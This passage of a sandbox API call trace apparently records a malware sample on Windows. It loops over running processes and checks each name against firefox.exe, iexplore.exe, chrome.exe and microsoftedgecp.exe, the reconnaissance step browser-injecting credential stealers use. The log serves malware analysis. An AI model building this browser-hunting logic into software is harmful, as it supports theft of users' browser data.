lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.335] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.335] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.335] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.335] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.335] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0181.335] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0181.335] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0181.335] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0181.335] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.335] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.336] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.336] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.336] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.336] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.336] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.336] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0181.336] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0181.336] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0181.336] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.336] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0181.337] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0181.337] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0181.337] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0181.337] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.337] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0181.337] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0181.337] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0181.337] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0181.338] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.338] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.338] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0181.338] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0181.338] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0181.338] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.338] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.339] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0181.339] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0181.339] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0181.339] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.339] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.339] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0181.339] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0181.339] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0181.339] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.339] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.340] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0181.340] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0181.340] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0181.340] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.340] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0181.341] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0181.341] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0181.341] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0181.341] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0181.341] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0181.341] CloseHandle (hObject=0xd4) returned 1 [0181.341] Sleep (dwMilliseconds=0x3e8) [0182.342] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0182.344] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.345] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0182.345] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0182.345] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0182.345] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0182.345] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0182.345] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0182.345] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0182.345] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0182.345] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0182.345] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0182.346] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0182.346] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0182.346] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0182.346] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.346] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.346] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0182.346] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0182.346] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0182.347] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.347] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0182.347] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0182.347] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0182.347] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0182.347] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.347] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.348] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0182.348] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0182.348] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0182.348] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.348] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0182.348] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0182.348] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0182.348] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0182.348] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.348] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0182.349] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0182.349] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0182.349] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0182.349] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.349] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0182.349] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0182.349] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0182.349] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0182.349] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.349] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0182.350] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0182.350] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0182.350] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0182.350] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.350] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.350] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.350] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.350] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.350] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.350] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.351] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.351] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.351] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.351] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.351] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.351] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.352] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.352] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.352] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.352] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.352] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.352] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.352] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.352] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.352] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.353] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.353] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.353] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.353] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.353] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0182.353] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0182.353] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0182.353] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0182.353] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.353] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.354] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.354] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.354] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.354] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.354] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.354] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.354] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.354] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.354] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.354] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0182.355] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0182.355] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0182.355] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0182.355] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.355] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0182.355] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0182.355] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0182.355] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0182.355] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.355] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0182.356] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0182.356] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0182.356] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0182.356] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.356] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.356] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.357] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.357] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.357] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.357] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0182.357] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0182.357] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0182.357] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0182.357] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.357] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0182.358] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0182.358] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0182.358] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0182.358] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.358] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0182.358] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0182.358] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0182.358] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0182.358] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.358] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0182.359] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0182.359] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0182.359] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0182.359] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.359] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0182.359] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0182.359] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0182.359] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0182.359] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.359] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0182.360] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0182.360] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0182.360] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0182.360] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.360] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0182.360] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0182.360] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0182.360] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0182.360] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.361] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, 